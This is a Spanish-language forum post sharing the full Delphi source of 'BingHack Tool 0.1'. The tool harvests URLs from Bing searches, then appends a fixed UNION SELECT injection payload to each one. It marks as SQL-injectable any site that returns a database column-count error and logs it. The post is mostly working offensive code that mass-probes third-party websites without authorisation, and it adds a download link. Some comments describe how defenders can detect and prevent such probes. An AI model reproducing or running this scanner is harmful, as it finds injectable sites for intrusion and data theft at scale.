[Delphi] BingHack Tool 0.1

Iniciado por BigBear, Mayo 31, 2013, 03:53:33 PM


Mayo 31, 2013, 03:53:33 PM Ultima modificación: Mayo 31, 2013, 05:23:02 PM por Doddy
Traducción a Delphi de este programa para buscar páginas vulnerables a SQLi usando Bing.

Una imagen :



El código:

Código: delphi

// BingHackTool 0.1
// Coded By Doddy H

unit bing;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, sButton, sMemo, sSkinManager, PerlRegEx, IdBaseComponent,
  IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, sEdit, sLabel, sGroupBox,
  sListBox, ComCtrls, sStatusBar, ShellApi, jpeg, ExtCtrls;

type
  // Main form of the tool. The fields are published component references and
  // the methods are published event handlers; the unit links a form resource
  // ({$R *.dfm}) that is not shown here, so names and order must stay as they
  // are. Roles below are taken from how the implementation section uses each
  // member.
  TForm1 = class(TForm)
    IdHTTP1: TIdHTTP; // single HTTP client used for every outbound GET
    PerlRegEx1: TPerlRegEx; // result-link extraction and error-string match
    sSkinManager1: TsSkinManager; // configured in FormCreate
    PerlRegEx2: TPerlRegEx; // trims a harvested link at its first '='
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    sEdit1: TsEdit; // search text sent to the search engine
    sLabel2: TsLabel;
    sEdit2: TsEdit; // number of result pages to fetch (parsed with StrToInt)
    sGroupBox2: TsGroupBox;
    sListBox1: TsListBox; // URLs harvested from the search results
    sGroupBox3: TsGroupBox;
    sListBox2: TsListBox; // URLs whose response contained the DB error text
    sStatusBar1: TsStatusBar; // progress text, panel 0
    sGroupBox4: TsGroupBox;
    sButton1: TsButton;
    sButton2: TsButton;
    sButton3: TsButton;
    sButton4: TsButton;
    Image1: TImage;
    procedure sButton1Click(Sender: TObject); // harvest URLs from search pages
    procedure sButton4Click(Sender: TObject); // close the form
    procedure sButton3Click(Sender: TObject); // show the author's contact text
    procedure FormCreate(Sender: TObject); // skin setup, switch CWD to logs
    procedure sButton2Click(Sender: TObject); // probe every harvested URL
    procedure sListBox1DblClick(Sender: TObject); // open bing-search.txt
    procedure sListBox2DblClick(Sender: TObject); // open sqli-founds.txt

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  // Global form instance; several handlers reference it directly instead of
  // Self.
  Form1: TForm1;

implementation

{$R *.dfm}

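// Appends one line of text to a log file, creating the file if it does not
// exist yet.
//
//   filename - path of the file to write. The callers in this unit pass bare
//              file names, so the path resolves against the process's current
//              directory.
//   texto    - line to write; Writeln adds the line terminator.
//
// With I/O checking enabled (the compiler default) a failed open or write
// surfaces as an exception to the caller.
//
// Review note: texto is written verbatim. In this unit it carries URLs that
// were extracted from remote HTML, so the resulting files hold untrusted
// text and should be treated as such by anything that later parses them.
procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  AssignFile(ar, filename);
  // FileMode is a process-wide global; the assignment is kept as in the
  // original so that other code observing it sees the same value.
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  // The file is open from here on: close the handle even when the write
  // raises (disk full, handle revoked), otherwise it stays locked until the
  // process exits.
  try
    Writeln(ar, texto);
  finally
    CloseFile(ar);
  end;

end;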

// Form start-up: activates the skin shipped next to the executable and makes
// "<exe dir>/logs" the current directory of the process.
//
// The ChDir call is what anchors every relative file name used later in this
// unit (the two log files written by savefile and opened through
// ShellExecute). It is a process-wide change, so any other relative path in
// the program resolves against the logs directory as well.
procedure TForm1.FormCreate(Sender: TObject);
var
  baseDir: string;
  logDir: string;
begin
  baseDir := ExtractFilePath(Application.ExeName);

  sSkinManager1.SkinDirectory := baseDir + 'Data';
  sSkinManager1.SkinName := 'falloutstyle';
  sSkinManager1.Active := True;

  logDir := baseDir + '/logs';

  // CreateDir's Boolean result is not checked; if creation fails, the
  // failure is only noticed by the ChDir below.
  if not DirectoryExists(logDir) then
    CreateDir(logDir);

  ChDir(logDir);
end;

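// Harvest step: fetches N result pages from the search engine for the text in
// sEdit1 (N = sEdit2), extracts the result links, cuts each link after its
// first '=' and lists the de-duplicated, sorted set in sListBox1. Every
// entry is also appended to bing-search.txt in the current directory.
//
// What the code does and does not do, as visible here:
//   - Only the search engine is contacted in this step; the listed sites
//     themselves receive no request until sButton2Click runs.
//   - The query goes out over plain http://, so both the search text and the
//     returned result list are readable and modifiable in transit.
//   - sEdit1.text is concatenated into the URL without URL-encoding;
//     StringReplace is called with an empty flag set, so only the first
//     space becomes '+'.
//   - StrToInt raises EConvertError when sEdit2 does not hold an integer;
//     IdHTTP1.Get raises on transport/protocol errors. Neither is caught.
//   - Links are pulled out of the HTML with a regular expression tied to the
//     '<h3><a href="' markup, so the result depends on that exact page
//     layout.
//
// Change in this version: the temporary TStringList used for
// de-duplication is now freed (it leaked on every click before).
procedure TForm1.sButton1Click(Sender: TObject);
var
  code: string;
  link1: string;
  linkfinal: string;
  z: integer;
  i: integer;
  ii: integer;
  chau: TStringList;
  target: string;

begin

  sListBox1.Items.Clear;

  target := StringReplace(sEdit1.text, ' ', '+', []);

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := 1 to StrToInt(sEdit2.text) do
  begin
    // Result offset passed as 'first=': 10, 20, 30, ...
    ii := i * 10;
    sListBox1.Update;
    sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
    Form1.sStatusBar1.Update;

    code := IdHTTP1.Get('http://www.bing.com/search?q=' + target + '&first=' +
        IntToStr(ii));

    PerlRegEx1.Regex := '<h3><a href="(.*?)"';
    PerlRegEx1.Subject := code;

    while PerlRegEx1.MatchAgain do
    begin
      // The pattern has one capture group, so this loop leaves link1 set to
      // the captured href value.
      for z := 1 to PerlRegEx1.SubExpressionCount do
        link1 := PerlRegEx1.SubExpressions[z];

      // Keep only links that contain '=', truncated right after the first
      // one (i.e. up to the first query-string value).
      PerlRegEx2.Regex := '(.*?)=(.*?)';
      PerlRegEx2.Subject := link1;

      if PerlRegEx2.Match then
      begin
        linkfinal := PerlRegEx2.SubExpressions[1] + '=';
        sListBox1.Items.Add(linkfinal);
      end;
    end;
  end;

  // Round-trip through a sorted, duplicate-ignoring list to de-duplicate the
  // list box; the helper list is released even if an Assign raises.
  chau := TStringList.Create;
  try
    chau.Duplicates := dupIgnore;
    chau.Sorted := True;
    chau.Assign(sListBox1.Items);
    sListBox1.Items.Clear;
    sListBox1.Items.Assign(chau);
  finally
    chau.Free;
  end;

  // The log file is append-only (see savefile), so repeated runs accumulate
  // entries, duplicates included.
  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    savefile('bing-search.txt', sListBox1.Items[i]);
  end;

  sStatusBar1.Panels[0].text := '[+] Done';
  Form1.sStatusBar1.Update;

end;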

// Probe step: walks sListBox1 from last to first, requests each entry with a
// fixed UNION SELECT suffix appended, and records the entry in sListBox2 and
// in sqli-founds.txt when the response body contains the database's
// "different number of columns" error text.
//
// Reading this from the defending side:
//   - Each probe is a single GET whose final query-string value ends in the
//     literal '-1+union+select+1--'. That suffix is constant, which makes
//     the requests straightforward to find in web-server, proxy or WAF logs.
//   - The check succeeds only when the application both concatenates the
//     parameter into SQL and returns the raw database error to the client.
//     Parameterised queries remove the first condition; generic error pages
//     (no DB error text in responses) remove the second.
//   - A match only shows that the error string appeared in the response; the
//     code performs no further verification.
//
// NOTE(review): both exception handlers are empty, so every failure
// (protocol errors and any other exception) is discarded without a trace in
// the UI or the log files.
// NOTE(review): the '[+] Done' status is set inside the loop, i.e. after
// every URL rather than once at the end.
procedure TForm1.sButton2Click(Sender: TObject);
var
  i: integer;
  code: string;

begin

  sListBox2.Items.Clear;

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    try
      begin

        sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
        Form1.sStatusBar1.Update;
        sListBox2.Update;
        // The list entry ends in '=' (see sButton1Click), so the suffix
        // becomes the value of that parameter.
        code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');

        // Plain-text match against the response body; the pattern contains
        // no regex metacharacters.
        PerlRegEx1.Regex :=
          'The used SELECT statements have a different number of columns';
        PerlRegEx1.Subject := code;

        if PerlRegEx1.Match then
        begin
          sListBox2.Items.Add(sListBox1.Items[i]);
          savefile('sqli-founds.txt', sListBox1.Items[i]);
        end;

      end;
    except
      // Deliberately ignored by the author: HTTP error statuses ...
      on E: EIdHttpProtocolException do
        ;
      // ... and everything else, including file errors raised by savefile.
      on E: Exception do
        ;
    end;

    sStatusBar1.Panels[0].text := '[+] Done';
    Form1.sStatusBar1.Update;

  end;

end;

// Shows the author's contact address in a modal message box.
procedure TForm1.sButton3Click(Sender: TObject);
const
  ContactNotice = 'Contact to lepuke[at]hotmail[com]';
begin
  ShowMessage(ContactNotice);
end;

// Closes the form held in the global Form1 variable (not Self).
procedure TForm1.sButton4Click(Sender: TObject);
begin
  Form1.Close;
end;

// Opens the harvest log with whatever program the shell associates with it.
//
// The file name is relative, so it resolves against the current directory
// (set to the logs folder in FormCreate). The ShellExecute result is not
// checked, so a missing file produces no feedback.
procedure TForm1.sListBox1DblClick(Sender: TObject);
const
  HarvestLog = 'bing-search.txt';
begin
  ShellExecute(Handle, 'open', HarvestLog, nil, nil, SW_SHOWNORMAL);
end;

// Opens the findings log with whatever program the shell associates with it.
//
// The file name is relative, so it resolves against the current directory
// (set to the logs folder in FormCreate). The ShellExecute result is not
// checked, so a missing file produces no feedback.
procedure TForm1.sListBox2DblClick(Sender: TObject);
const
  FindingsLog = 'sqli-founds.txt';
begin
  ShellExecute(Handle, 'open', FindingsLog, nil, nil, SW_SHOWNORMAL);
end;

end.

// The End ?


Si quieren bajar el programa pueden hacerlo de [enlaces no visibles sin iniciar sesión].